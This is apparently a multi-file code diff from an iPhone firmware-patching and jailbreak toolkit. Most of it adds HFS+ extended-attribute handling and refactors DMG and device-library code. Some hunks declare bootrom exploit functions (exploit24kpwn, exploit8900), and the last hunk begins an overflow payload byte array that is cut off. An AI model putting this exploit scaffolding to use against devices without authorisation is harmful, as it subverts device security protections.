printf("Extended attributes\n"); + while(attrs != NULL) { + next = attrs->next; + printf("\t%s\n", attrs->name); + free(attrs->name); + free(attrs); + attrs = next; + } + } } void hfs_ls(Volume* volume, const char* path) { @@ -559,7 +630,7 @@ void hfs_ls(Volume* volume, const char* path) { if(record->recordType == kHFSPlusFolderRecord) displayFolder(((HFSPlusCatalogFolder*)record)->folderID, volume); else - displayFileLSLine((HFSPlusCatalogFile*)record, name); + displayFileLSLine(volume, (HFSPlusCatalogFile*)record, name); } else { printf("No such file or directory\n"); } @@ -610,7 +681,8 @@ void hfs_untar(Volume* volume, AbstractFile* tarFile) { HFSPlusCatalogRecord* record = getRecordFromPath3(fileName, volume, NULL, NULL, TRUE, FALSE, kHFSRootFolderID); if(record) { if(record->recordType == kHFSPlusFolderRecord || type == 5) { - printf("ignoring %s, type = %d\n", fileName, type); + if(!silence) + printf("ignoring %s, type = %d\n", fileName, type); free(record); goto loop; } else { @@ -621,7 +693,8 @@ void hfs_untar(Volume* volume, AbstractFile* tarFile) { } if(type == 0) { - printf("file: %s (%04o), size = %d\n", fileName, mode, size); + if(!silence) + printf("file: %s (%04o), size = %d\n", fileName, mode, size); void* buffer = malloc(size); tarFile->seek(tarFile, curRecord + 512); tarFile->read(tarFile, buffer, size); @@ -629,10 +702,12 @@ void hfs_untar(Volume* volume, AbstractFile* tarFile) { add_hfs(volume, inFile, fileName); free(buffer); } else if(type == 5) { - printf("directory: %s (%04o)\n", fileName, mode); + if(!silence) + printf("directory: %s (%04o)\n", fileName, mode); newFolder(fileName, volume); } else if(type == 2) { - printf("symlink: %s (%04o) -> %s\n", fileName, mode, target); + if(!silence) + printf("symlink: %s (%04o) -> %s\n", fileName, mode, target); makeSymlink(fileName, target, volume); } hfs/hfslib.c @@ -174,6 +174,9 @@ static int rawFileRead(io_func* io,off_t location, size_t size, void *buffer) { volume = rawFile->volume; blockSize = volume->volumeHeader->blockSize; + if(!rawFile->extents) + return FALSE; + extent = rawFile->extents; fileLoc = 0; hfs/rawfile.c @@ -98,62 +98,76 @@ int updateVolume(Volume* volume) { } Volume* openVolume(io_func* io) { - Volume* volume; - io_func* file; - - volume = (Volume*) malloc(sizeof(Volume)); - volume->image = io; - volume->extentsTree = NULL; - - volume->volumeHeader = readVolumeHeader(io, 1024); - if(volume->volumeHeader == NULL) { - free(volume); - return NULL; - } - - file = openRawFile(kHFSExtentsFileID, &volume->volumeHeader->extentsFile, NULL, volume); - if(file == NULL) { - free(volume->volumeHeader); - free(volume); - return NULL; - } - - volume->extentsTree = openExtentsTree(file); - if(volume->extentsTree == NULL) { - free(volume->volumeHeader); - free(volume); - return NULL; - } - - file = openRawFile(kHFSCatalogFileID, &volume->volumeHeader->catalogFile, NULL, volume); - if(file == NULL) { - closeBTree(volume->extentsTree); - free(volume->volumeHeader); - free(volume); - return NULL; - } - - volume->catalogTree = openCatalogTree(file); - if(volume->catalogTree == NULL) { - closeBTree(volume->extentsTree); - free(volume->volumeHeader); - free(volume); - return NULL; - } - - volume->allocationFile = openRawFile(kHFSAllocationFileID, &volume->volumeHeader->allocationFile, NULL, volume); - if(volume->catalogTree == NULL) { - closeBTree(volume->catalogTree); - closeBTree(volume->extentsTree); - free(volume->volumeHeader); - free(volume); - return NULL; - } - - return volume; + Volume* volume; + io_func* file; + + volume = (Volume*) malloc(sizeof(Volume)); + volume->image = io; + volume->extentsTree = NULL; + + volume->volumeHeader = readVolumeHeader(io, 1024); + if(volume->volumeHeader == NULL) { + free(volume); + return NULL; + } + + file = openRawFile(kHFSExtentsFileID, &volume->volumeHeader->extentsFile, NULL, volume); + if(file == NULL) { + free(volume->volumeHeader); + free(volume); + return NULL; + } + + volume->extentsTree = openExtentsTree(file); + if(volume->extentsTree == NULL) { + free(volume->volumeHeader); + free(volume); + return NULL; + } + + file = openRawFile(kHFSCatalogFileID, &volume->volumeHeader->catalogFile, NULL, volume); + if(file == NULL) { + closeBTree(volume->extentsTree); + free(volume->volumeHeader); + free(volume); + return NULL; + } + + volume->catalogTree = openCatalogTree(file); + if(volume->catalogTree == NULL) { + closeBTree(volume->extentsTree); + free(volume->volumeHeader); + free(volume); + return NULL; + } + + volume->allocationFile = openRawFile(kHFSAllocationFileID, &volume->volumeHeader->allocationFile, NULL, volume); + if(volume->allocationFile == NULL) { + closeBTree(volume->catalogTree); + closeBTree(volume->extentsTree); + free(volume->volumeHeader); + free(volume); + return NULL; + } + + volume->attrTree = NULL; + file = openRawFile(kHFSAttributesFileID, &volume->volumeHeader->attributesFile, NULL, volume); + if(file != NULL) { + volume->attrTree = openAttributesTree(file); + if(!volume->attrTree) { + CLOSE(file); + } + } + + volume->metadataDir = getMetadataDirectoryID(volume); + + return volume; } void closeVolume(Volume *volume) { + if(volume->attrTree) + closeBTree(volume->attrTree); + CLOSE(volume->allocationFile); closeBTree(volume->catalogTree); closeBTree(volume->extentsTree); hfs/volume.c @@ -271,7 +271,6 @@ int main(int argc, char* argv[]) extractedIPSWPath = tmpFilePath; bootImagePath = "restore.img3"; - fprintf(stdout, "\nGetting iPhone/iPod status...\n"); fflush(stdout); idevice/idevice.c @@ -2,11 +2,7 @@ #define MOBILEDEVICE_H #define CF_BUILDING_CF_AS_LIB -#if __APPLE__ -#include <CoreFoundation/CoreFoundation.h> -#else #include <CoreFoundation.h> -#endif typedef unsigned int mach_error_t; /* Error codes */ @@ -154,26 +150,6 @@ mach_error_t AMRestoreEnableFileLogging(char *path); mach_error_t AMRestorePerformDFURestore(struct am_recovery_device *rdev, CFDictionaryRef opts, void *callback, void *user_info); -mach_error_t AMRestorePerformRecoveryModeRestore(struct am_recovery_device *rdev, CFDictionaryRef opts, void *callback, void *user_info); - -unsigned int* AMRecoveryModeDeviceGetProgress(struct am_recovery_device *rdev, unsigned int* progress, unsigned int* total); - -mach_error_t AMRecoveryModeDeviceSetAutoBoot(struct am_recovery_device *rdev, char autoboot); - -mach_error_t AMDeviceEnterRecovery(struct am_device *rdev); - -mach_error_t AMDeviceConnect(struct am_device *device); - -mach_error_t AMDeviceIsPaired(struct am_device *device); - -mach_error_t AMDevicePair(struct am_device *device); - -mach_error_t AMDeviceValidatePairing(struct am_device *device); - -mach_error_t AMDeviceStartSession(struct am_device *device); - -CFStringRef AMDeviceCopyValue(struct am_device *device, unsigned int, const CFStringRef cfstring); - int sendCommandToDevice(am_recovery_device *rdev, CFStringRef cfs, int block); int sendFileToDevice(am_recovery_device *rdev, CFStringRef filename); idevice/mobiledevice.h @@ -30,39 +30,13 @@ typedef mach_error_t (*AMRestoreEnableFileLoggingFunctionType)(char *path); typedef mach_error_t (*AMRestorePerformDFURestoreFunctionType)(struct am_recovery_device *rdev, CFDictionaryRef opts, void *callback, void *user_info); -typedef mach_error_t (*AMRestorePerformRecoveryModeRestoreFunctionType)(struct am_recovery_device *rdev, CFDictionaryRef opts, void *callback, void *user_info); - typedef int (__cdecl * cmdsend) (am_recovery_device *, am_recovery_device *, CFStringRef, int block) __attribute__ ((cdecl)); -typedef unsigned int* (*AMRecoveryModeDeviceGetProgressFunctionType)(struct am_recovery_device *rdev, unsigned int* progress, unsigned int* total); - -typedef mach_error_t (*AMRecoveryModeDeviceSetAutoBootFunctionType)(struct am_recovery_device *rdev, char autoboot); - -typedef mach_error_t (*AMDeviceEnterRecoveryFunctionType)(struct am_device *rdev); - -typedef mach_error_t (*AMDeviceConnectFunctionType)(struct am_device *device); -typedef mach_error_t (*AMDeviceIsPairedFunctionType)(struct am_device *device); -typedef mach_error_t (*AMDevicePairFunctionType)(struct am_device *device); -typedef mach_error_t (*AMDeviceValidatePairingFunctionType)(struct am_device *device); -typedef mach_error_t (*AMDeviceStartSessionFunctionType)(struct am_device *device); - -typedef CFStringRef (*AMDeviceCopyValueFunctionType)(struct am_device *device, unsigned int, const CFStringRef cfstring); - static AMDeviceNotificationSubscribeFunctionType AMDeviceNotificationSubscribeFunction = NULL; static AMRestoreRegisterForDeviceNotificationsFunctionType AMRestoreRegisterForDeviceNotificationsFunction = NULL; static AMRestoreCreateDefaultOptionsFunctionType AMRestoreCreateDefaultOptionsFunction = NULL; static AMRestoreEnableFileLoggingFunctionType AMRestoreEnableFileLoggingFunction = NULL; static AMRestorePerformDFURestoreFunctionType AMRestorePerformDFURestoreFunction = NULL; -static AMRestorePerformRecoveryModeRestoreFunctionType AMRestorePerformRecoveryModeRestoreFunction = NULL; -static AMRecoveryModeDeviceGetProgressFunctionType AMRecoveryModeDeviceGetProgressFunction = NULL; -static AMRecoveryModeDeviceSetAutoBootFunctionType AMRecoveryModeDeviceSetAutoBootFunction = NULL; -static AMDeviceEnterRecoveryFunctionType AMDeviceEnterRecoveryFunction = NULL; -static AMDeviceConnectFunctionType AMDeviceConnectFunction = NULL; -static AMDeviceIsPairedFunctionType AMDeviceIsPairedFunction = NULL; -static AMDevicePairFunctionType AMDevicePairFunction = NULL; -static AMDeviceValidatePairingFunctionType AMDeviceValidatePairingFunction = NULL; -static AMDeviceStartSessionFunctionType AMDeviceStartSessionFunction = NULL; -static AMDeviceCopyValueFunctionType AMDeviceCopyValueFunction = NULL; static cmdsend priv_sendCommandToDevice = NULL; static cmdsend priv_sendFileToDevice = NULL; @@ -76,7 +50,6 @@ typedef struct tagDLLOFFSET { DLLOFFSET OffSetTable[]= { // VerMS VerLS GetProductType, SendCmdO SendFileO - {0x0B90002, 0x00000004, 0x0000ED90, 0x0000F2C0, 0x0000F6F0}, {0x0070008, 0x00760000, 0x0000FDA0, 0x00010290, 0x00010630}, {0x0070008, 0x00B00000, 0x0000FDF0, 0x000102E0, 0x00010680}, {0x0000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000} @@ -211,15 +184,6 @@ int LoadWindowsDLL() { return -1; } - AMRestorePerformRecoveryModeRestoreFunction = - (AMRestorePerformRecoveryModeRestoreFunctionType) GetProcAddress(deviceDLL, "AMRestorePerformRecoveryModeRestore"); - - if(!AMRestorePerformRecoveryModeRestoreFunction ) - { - XLOG(2, "failed to load AMRestorePerformRecoveryModeRestore"); - return -1; - } - AMRestoreEnableFileLoggingFunction = (AMRestoreEnableFileLoggingFunctionType) GetProcAddress(deviceDLL, "AMRestoreEnableFileLogging"); @@ -229,87 +193,7 @@ int LoadWindowsDLL() { return -1; } - AMRecoveryModeDeviceGetProgressFunction = - (AMRecoveryModeDeviceGetProgressFunctionType) GetProcAddress(deviceDLL, "AMRecoveryModeDeviceGetProgress"); - - if(!AMRecoveryModeDeviceGetProgressFunction ) - { - XLOG(2, "failed to load AMRecoveryModeDeviceGetProgress"); - return -1; - } - AMRecoveryModeDeviceSetAutoBootFunction = - (AMRecoveryModeDeviceSetAutoBootFunctionType) GetProcAddress(deviceDLL, "AMRecoveryModeDeviceSetAutoBoot"); - - if(!AMRecoveryModeDeviceSetAutoBootFunction ) - { - XLOG(2, "failed to load AMRecoveryModeDeviceSetAutoBoot"); - return -1; - } - - AMDeviceEnterRecoveryFunction = - (AMDeviceEnterRecoveryFunctionType) GetProcAddress(deviceDLL, "AMDeviceEnterRecovery"); - - if(!AMDeviceEnterRecoveryFunction ) - { - XLOG(2, "failed to load AMDeviceEnterRecovery"); - return -1; - } - - AMDeviceConnectFunction = - (AMDeviceConnectFunctionType) GetProcAddress(deviceDLL, "AMDeviceConnect"); - - if(!AMDeviceConnectFunction) - { - XLOG(2, "failed to load AMDeviceConnect"); - return -1; - } - - AMDeviceIsPairedFunction = - (AMDeviceIsPairedFunctionType) GetProcAddress(deviceDLL, "AMDeviceIsPaired"); - - if(!AMDeviceIsPairedFunction) - { - XLOG(2, "failed to load AMDeviceIsPaired"); - return -1; - } - - AMDevicePairFunction = - (AMDevicePairFunctionType) GetProcAddress(deviceDLL, "AMDevicePair"); - - if(!AMDevicePairFunction) - { - XLOG(2, "failed to load AMDevicePair"); - return -1; - } - - AMDeviceValidatePairingFunction = - (AMDeviceValidatePairingFunctionType) GetProcAddress(deviceDLL, "AMDeviceValidatePairing"); - - if(!AMDeviceValidatePairingFunction) - { - XLOG(2, "failed to load AMDeviceValidatePairing"); - return -1; - } - - AMDeviceStartSessionFunction = - (AMDeviceStartSessionFunctionType) GetProcAddress(deviceDLL, "AMDeviceStartSession"); - - if(!AMDeviceStartSessionFunction) - { - XLOG(2, "failed to load AMDeviceStartSession"); - return -1; - } - - AMDeviceCopyValueFunction = - (AMDeviceCopyValueFunctionType) GetProcAddress(deviceDLL, "AMDeviceCopyValue"); - - if(!AMDeviceCopyValueFunction) - { - XLOG(2, "failed to load AMDeviceCopyValue"); - return -1; - } - initWindowsPrivateFunctions(deviceDLL); return 0; @@ -354,65 +238,6 @@ mach_error_t AMRestorePerformDFURestore(struct am_recovery_device *rdev, CFDicti return AMRestorePerformDFURestoreFunction(rdev, opts, callback, user_info); } -mach_error_t AMRestorePerformRecoveryModeRestore(struct am_recovery_device *rdev, CFDictionaryRef opts, void *callback, void *user_info) -{ - XLOG(3, "calling Windows AMRestorePerformRecoveryModeRestore"); - return AMRestorePerformRecoveryModeRestoreFunction(rdev, opts, callback, user_info); -} - -mach_error_t AMRecoveryModeDeviceSetAutoBoot(struct am_recovery_device *rdev, char autoboot) -{ - XLOG(3, "calling Windows AMRecoveryModeDeviceSetAutoBoot"); - return AMRecoveryModeDeviceSetAutoBootFunction(rdev, autoboot); -} - -mach_error_t AMDeviceEnterRecovery(struct am_device *rdev) -{ - XLOG(3, "calling Windows AMDeviceEnterRecovery"); - return AMDeviceEnterRecoveryFunction(rdev); -} - -mach_error_t AMDeviceConnect(struct am_device *rdev) -{ - XLOG(3, "calling Windows AMDeviceConnect"); - return AMDeviceConnectFunction(rdev); -} - -mach_error_t AMDeviceIsPaired(struct am_device *rdev) -{ - XLOG(3, "calling Windows AMDeviceIsPaired"); - return AMDeviceIsPairedFunction(rdev); -} - -mach_error_t AMDevicePair(struct am_device *rdev) -{ - XLOG(3, "calling Windows AMDevicePair"); - return AMDevicePairFunction(rdev); -} - -mach_error_t AMDeviceValidatePairing(struct am_device *rdev) -{ - XLOG(3, "calling Windows AMDeviceValidatePairing"); - return AMDeviceValidatePairingFunction(rdev); -} - -mach_error_t AMDeviceStartSession(struct am_device *rdev) -{ - XLOG(3, "calling Windows AMDeviceStartSession"); - return AMDeviceStartSessionFunction(rdev); -} - -CFStringRef AMDeviceCopyValue(struct am_device *device, unsigned int should_be_zero, const CFStringRef cfstring) -{ - XLOG(3, "calling Windows AMDeviceCopyValue"); - return AMDeviceCopyValueFunction(device, should_be_zero, cfstring); -} - -unsigned int* AMRecoveryModeDeviceGetProgress(struct am_recovery_device *rdev, unsigned int* progress, unsigned int* total) -{ - return AMRecoveryModeDeviceGetProgressFunction(rdev, progress, total); -} - int sendCommandToDevice(am_recovery_device *rdev, CFStringRef cfs, int block) { XLOG(3, "calling Windows sendCommandToDevice %p %p %p %d", priv_sendCommandToDevice, rdev, cfs, block); idevice/windows.c @@ -34,12 +34,12 @@ #define PARTITION_SIZE 0x3f #define ATAPI_SIZE 0x8 #define FREE_SIZE 0xa -#define EXTRA_SIZE (DDM_SIZE + PARTITION_SIZE + ATAPI_SIZE + FREE_SIZE) +#define EXTRA_SIZE (ATAPI_OFFSET + ATAPI_SIZE + FREE_SIZE) #define DDM_OFFSET 0x0 #define PARTITION_OFFSET (DDM_SIZE) -#define ATAPI_OFFSET (DDM_SIZE + PARTITION_SIZE) -#define USER_OFFSET (DDM_SIZE + PARTITION_SIZE + ATAPI_SIZE) +#define ATAPI_OFFSET 64 +#define USER_OFFSET (ATAPI_OFFSET + ATAPI_SIZE) #define BOOTCODE_DMMY 0x444D4D59 #define BOOTCODE_GOON 0x676F6F6E @@ -274,6 +274,8 @@ static inline void writeUInt64(AbstractFile* file, uint64_t data) { #ifdef __cplusplus extern "C" { #endif + void outResources(AbstractFile* file, AbstractFile* out); + unsigned char* decodeBase64(char* toDecode, size_t* dataLength); void writeBase64(AbstractFile* file, unsigned char* data, size_t dataLength, int tabLength, int width); char* convertBase64(unsigned char* data, size_t dataLength, int tabLength, int width); @@ -319,22 +321,22 @@ extern "C" { void flipPartitionMultiple(Partition* partition, char multiple, char out, unsigned int BlockSize); void readDriverDescriptorMap(AbstractFile* file, ResourceKey* resources); - DriverDescriptorRecord* createDriverDescriptorMap(uint32_t numSectors); - void writeDriverDescriptorMap(AbstractFile* file, DriverDescriptorRecord* DDM, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources); + DriverDescriptorRecord* createDriverDescriptorMap(uint32_t numSectors, unsigned int BlockSize); + int writeDriverDescriptorMap(int pNum, AbstractFile* file, DriverDescriptorRecord* DDM, unsigned int BlockSize, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources); void readApplePartitionMap(AbstractFile* file, ResourceKey* resources, unsigned int BlockSize); - Partition* createApplePartitionMap(uint32_t numSectors, const char* volumeType); - void writeApplePartitionMap(AbstractFile* file, Partition* partitions, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources, NSizResource** nsizIn); - void writeATAPI(AbstractFile* file, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources, NSizResource** nsizIn); - void writeFreePartition(AbstractFile* outFile, uint32_t numSectors, ResourceKey** resources); + Partition* createApplePartitionMap(uint32_t numSectors, const char* volumeType, unsigned int BlockSize); + int writeApplePartitionMap(int pNum, AbstractFile* file, Partition* partitions, unsigned int BlockSize, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources, NSizResource** nsizIn); + int writeATAPI(int pNum, AbstractFile* file, unsigned int BlockSize, ChecksumFunc dataForkChecksum, void* dataForkToken, ResourceKey **resources, NSizResource** nsizIn); + int writeFreePartition(int pNum, AbstractFile* outFile, uint32_t offset, uint32_t numSectors, ResourceKey** resources); void extractBLKX(AbstractFile* in, AbstractFile* out, BLKXTable* blkx); BLKXTable* insertBLKX(AbstractFile* out, AbstractFile* in, uint32_t firstSectorNumber, uint32_t numSectors, uint32_t blocksDescriptor, uint32_t checksumType, ChecksumFunc uncompressedChk, void* uncompressedChkToken, ChecksumFunc compressedChk, - void* compressedChkToken, Volume* volume); + void* compressedChkToken, Volume* volume, int addComment); int extractDmg(AbstractFile* abstractIn, AbstractFile* abstractOut, int partNum); - int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut); + int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut, unsigned int BlockSize); int convertToISO(AbstractFile* abstractIn, AbstractFile* abstractOut); int convertToDMG(AbstractFile* abstractIn, AbstractFile* abstractOut); #ifdef __cplusplus includes/dmg/dmg.h @@ -8,7 +8,7 @@ extern "C" { #endif int extractDmg(AbstractFile* abstractIn, AbstractFile* abstractOut, int partNum); - int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut); + int buildDmg(AbstractFile* abstractIn, AbstractFile* abstractOut, unsigned int BlockSize); int convertToDMG(AbstractFile* abstractIn, AbstractFile* abstractOut); int convertToISO(AbstractFile* abstractIn, AbstractFile* abstractOut); includes/dmg/dmglib.h @@ -18,6 +18,7 @@ extern "C" { void hfs_untar(Volume* volume, AbstractFile* tarFile); void hfs_ls(Volume* volume, const char* path); + void hfs_setsilence(int s); #ifdef __cplusplus } #endif includes/hfs/hfslib.h @@ -28,6 +28,10 @@ typedef void (*keyPrintFunc)(BTKey* toPrint); typedef int (*keyWriteFunc)(off_t offset, BTKey* toWrite, struct io_func_struct* io); typedef int (*compareFunc)(BTKey* left, BTKey* right); +#define STR_SIZE(str) (sizeof(uint16_t) + (sizeof(uint16_t) * (str).length)) + +#ifndef __HFS_FORMAT__ + typedef uint32_t HFSCatalogNodeID; enum { @@ -44,8 +48,6 @@ enum { kHFSFirstUserCatalogNodeID = 16 }; -#define STR_SIZE(str) (sizeof(uint16_t) + (sizeof(uint16_t) * (str).length)) - struct HFSUniStr255 { uint16_t length; uint16_t unicode[255]; @@ -261,6 +263,8 @@ struct ExtendedFolderInfo { } __attribute__((__packed__)); typedef struct ExtendedFolderInfo ExtendedFolderInfo; +#ifndef _STAT_H_ +#ifndef _SYS_STAT_H #define S_ISUID 0004000 /* set user id on execution */ #define S_ISGID 0002000 /* set group id on execution */ #define S_ISTXT 0001000 /* sticky bit */ @@ -289,6 +293,10 @@ typedef struct ExtendedFolderInfo ExtendedFolderInfo; #define S_IFLNK 0120000 /* symbolic link */ #define S_IFSOCK 0140000 /* socket */ #define S_IFWHT 0160000 /* whiteout */ +#endif +#endif + +#define UF_COMPRESSED 040 struct HFSPlusBSDInfo { uint32_t ownerID; @@ -381,6 +389,58 @@ struct HFSPlusCatalogThread { } __attribute__((__packed__)); typedef struct HFSPlusCatalogThread HFSPlusCatalogThread; +enum { + kHFSPlusAttrInlineData = 0x10, + kHFSPlusAttrForkData = 0x20, + kHFSPlusAttrExtents = 0x30 +}; + +struct HFSPlusAttrForkData { + uint32_t recordType; + uint32_t reserved; + HFSPlusForkData theFork; +} __attribute__((__packed__)); +typedef struct HFSPlusAttrForkData HFSPlusAttrForkData; + +struct HFSPlusAttrExtents { + uint32_t recordType; + uint32_t reserved; + HFSPlusExtentRecord extents; +}; +typedef struct HFSPlusAttrExtents HFSPlusAttrExtents; + +struct HFSPlusAttrData { + uint32_t recordType; + uint32_t reserved[2]; + uint32_t size; + uint8_t data[0]; +} __attribute__((__packed__)); +typedef struct HFSPlusAttrData HFSPlusAttrData; + +union HFSPlusAttrRecord { + uint32_t recordType; + HFSPlusAttrData attrData; + HFSPlusAttrForkData forkData; + HFSPlusAttrExtents overflowExtents; +}; +typedef union HFSPlusAttrRecord HFSPlusAttrRecord; + +struct HFSPlusAttrKey { + uint16_t keyLength; + uint16_t pad; + uint32_t fileID; + uint32_t startBlock; + HFSUniStr255 name; +} __attribute__((__packed__)); +typedef struct HFSPlusAttrKey HFSPlusAttrKey; + +enum { + kHardLinkFileType = 0x686C6E6B, /* 'hlnk' */ + kHFSPlusCreator = 0x6866732B /* 'hfs+' */ +}; + +#endif + struct HFSPlusCatalogRecord { int16_t recordType; unsigned char data[0]; @@ -394,6 +454,12 @@ struct CatalogRecordList { }; typedef struct CatalogRecordList CatalogRecordList; +struct XAttrList { + char* name; + struct XAttrList* next; +}; +typedef struct XAttrList XAttrList; + struct Extent { uint32_t startBlock; uint32_t blockCount; @@ -418,7 +484,9 @@ typedef struct { BTree* extentsTree; BTree* catalogTree; + BTree* attrTree; io_func* allocationFile; + HFSCatalogNodeID metadataDir; } Volume; @@ -457,6 +525,12 @@ extern "C" { io_func* openRawFile(HFSCatalogNodeID id, HFSPlusForkData* forkData, HFSPlusCatalogRecord* catalogRecord, Volume* volume); + BTree* openAttributesTree(io_func* file); + size_t getAttribute(Volume* volume, uint32_t fileID, const char* name, uint8_t** data); + int setAttribute(Volume* volume, uint32_t fileID, const char* name, uint8_t* data, size_t size); + int unsetAttribute(Volume* volume, uint32_t fileID, const char* name); + XAttrList* getAllExtendedAttributes(HFSCatalogNodeID CNID, Volume* volume); + void flipExtentRecord(HFSPlusExtentRecord* extentRecord); BTree* openExtentsTree(io_func* file); @@ -477,6 +551,7 @@ extern "C" { int chownFile(const char* pathName, uint32_t owner, uint32_t group, Volume* volume); int makeSymlink(const char* pathName, const char* target, Volume* volume); + HFSCatalogNodeID getMetadataDirectoryID(Volume* volume); HFSPlusCatalogRecord* getRecordByCNID(HFSCatalogNodeID CNID, Volume* volume); HFSPlusCatalogRecord* getLinkTarget(HFSPlusCatalogRecord* record, HFSCatalogNodeID parentID, HFSPlusCatalogKey *key, Volume* volume); CatalogRecordList* getFolderContents(HFSCatalogNodeID CNID, Volume* volume); includes/hfs/hfsplus.h @@ -42,9 +42,16 @@ typedef struct Info8900 { char exploit; } Info8900; -AbstractFile* createAbstractFileFrom8900(AbstractFile* file); -AbstractFile* duplicate8900File(AbstractFile* file, AbstractFile* backing); -void replaceCertificate8900(AbstractFile* file, AbstractFile* certificate); -void exploit8900(AbstractFile* file); +#ifdef __cplusplus +extern "C" { +#endif + AbstractFile* createAbstractFileFrom8900(AbstractFile* file); + AbstractFile* duplicate8900File(AbstractFile* file, AbstractFile* backing); + void replaceCertificate8900(AbstractFile* file, AbstractFile* certificate); + void exploit8900(AbstractFile* file); +#ifdef __cplusplus +} +#endif + #endif includes/xpwn/8900.h @@ -16,12 +16,14 @@ #define IMG3_SHSH_MAGIC 0x53485348 #define IMG3_CERT_MAGIC 0x43455254 #define IMG3_KBAG_MAGIC 0x4B424147 +#define IMG3_TYPE_MAGIC 0x54595045 #define IMG3_SIGNATURE IMG3_MAGIC typedef struct Img3Element Img3Element; +typedef struct Img3Info Img3Info; -typedef void (*WriteImg3)(AbstractFile* file, Img3Element* element); +typedef void (*WriteImg3)(AbstractFile* file, Img3Element* element, Img3Info* info); typedef void (*FreeImg3)(Img3Element* element); typedef struct AppleImg3Header { @@ -55,19 +57,23 @@ struct Img3Element struct Img3Element* next; }; -typedef struct Img3Info { +struct Img3Info { AbstractFile* file; Img3Element* root; Img3Element* data; Img3Element* cert; Img3Element* kbag; + Img3Element* type; int encrypted; AES_KEY encryptKey; AES_KEY decryptKey; uint8_t iv[16]; size_t offset; + uint32_t replaceDWord; char dirty; -} Img3Info; + char exploit24k; + char exploitN8824k; +}; #ifdef __cplusplus extern "C" { @@ -75,6 +81,8 @@ extern "C" { AbstractFile* createAbstractFileFromImg3(AbstractFile* file); AbstractFile* duplicateImg3File(AbstractFile* file, AbstractFile* backing); void replaceCertificateImg3(AbstractFile* file, AbstractFile* certificate); + void exploit24kpwn(AbstractFile* file); + void exploitN8824kpwn(AbstractFile* file); #ifdef __cplusplus } #endif includes/xpwn/img3.h @@ -11,6 +11,7 @@ extern "C" { #endif AbstractFile* openAbstractFile(AbstractFile* file); AbstractFile* openAbstractFile2(AbstractFile* file, const unsigned int* key, const unsigned int* iv); + AbstractFile* openAbstractFile3(AbstractFile* file, const unsigned int* key, const unsigned int* iv, int layers); AbstractFile* duplicateAbstractFile(AbstractFile* file, AbstractFile* backing); AbstractFile* duplicateAbstractFile2(AbstractFile* file, AbstractFile* backing, const unsigned int* key, const unsigned int* iv, AbstractFile* certificate); #ifdef __cplusplus includes/xpwn/nor_files.h @@ -15,6 +15,7 @@ extern "C" { Dictionary* parseIPSW2(const char* inputIPSW, const char* bundleRoot, char** bundlePath, OutputState** state, int useMemory); int doPatch(StringValue* patchValue, StringValue* fileValue, const char* bundlePath, OutputState** state, unsigned int* key, unsigned int* iv, int useMemory); void doPatchInPlace(Volume* volume, const char* filePath, const char* patchPath); + void doPatchInPlaceMemoryPatch(Volume* volume, const char* filePath, void** patch, size_t* patchSize); void fixupBootNeuterArgs(Volume* volume, char unlockBaseband, char selfDestruct, char use39, char use46); void createRestoreOptions(Volume* volume, int SystemPartitionSize, int UpdateBaseband); includes/xpwn/pwnutil.h @@ -68,7 +68,7 @@ IF(APPLE) DEPENDS xpwn dmg hfs common minizip) ELSE(APPLE) ADD_CUSTOM_TARGET(libXPwn.a - COMMAND ${CMAKE_C_COMPILER} + COMMAND ${CMAKE_C_COMPILER} ${CMAKE_C_FLAGS} -L${PROJECT_BINARY_DIR}/ipsw-patch -L${PROJECT_BINARY_DIR}/dmg -L${PROJECT_BINARY_DIR}/hfs -L${PROJECT_BINARY_DIR}/hfs -L${PROJECT_BINARY_DIR}/minizip -L${PROJECT_BINARY_DIR}/common -Xlinker --whole-archive -lxpwn -ldmg -lhfs -lcommon -lminizip ipsw-patch/CMakeLists.txt @@ -194,6 +194,10 @@ void pngError(png_structp png_ptr, png_const_charp error_msg) { exit(0); } +void pngWarn(png_structp png_ptr, png_const_charp error_msg) { + XLOG(0, "warning: %s\n", error_msg); +} + int convertToPNG(AbstractFile* imageWrapper, const unsigned int* key, const unsigned int* iv, const char* png) { AbstractFile* imageFile; @@ -208,7 +212,7 @@ int convertToPNG(AbstractFile* imageWrapper, const unsigned int* key, const unsi } InfoIBootIM* info = (InfoIBootIM*) (imageFile->data); - png_structp png_ptr = png_create_write_struct(PNG_LIBPNG_VER_STRING, NULL, pngError, pngError); + png_structp png_ptr = png_create_write_struct(PNG_LIBPNG_VER_STRING, NULL, pngError, pngWarn); if (!png_ptr) { return -1; } @@ -226,11 +230,15 @@ int convertToPNG(AbstractFile* imageWrapper, const unsigned int* key, const unsi int bytes_per_pixel; if(info->header.format == IBOOTIM_ARGB) { + XLOG(3, "ARGB"); color_type = PNG_COLOR_TYPE_RGB_ALPHA; bytes_per_pixel = 4; } else if(info->header.format == IBOOTIM_GREY) { + XLOG(3, "Grayscale"); color_type = PNG_COLOR_TYPE_GRAY_ALPHA; bytes_per_pixel = 2; + } else { + XLOG(3, "Unknown color type!"); } png_set_IHDR(png_ptr, info_ptr, info->header.width, info->header.height, @@ -278,7 +286,7 @@ void* replaceBootImage(AbstractFile* imageWrapper, const unsigned int* key, cons } png->seek(png, 0); - png_structp png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, pngError, pngError); + png_structp png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, pngError, pngWarn); if (!png_ptr) { return NULL; } @@ -324,7 +332,7 @@ void* replaceBootImage(AbstractFile* imageWrapper, const unsigned int* key, cons png_set_expand(png_ptr); png_set_strip_16(png_ptr); png_set_bgr(png_ptr); - png_set_add_alpha(png_ptr, 0xff, PNG_FILLER_AFTER); + png_set_add_alpha(png_ptr, 0x0, PNG_FILLER_AFTER); png_set_invert_alpha(png_ptr); png_read_update_info(png_ptr, info_ptr); ipsw-patch/ibootim.c @@ -2,6 +2,95 @@ #include <string.h> #include "common.h" #include <xpwn/img3.h> +#include <xpwn/libxpwn.h> + +static const uint8_t x24kpwn_overflow_data[] = { + 0x12, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x40, 0xac, 0x05, 0x81, 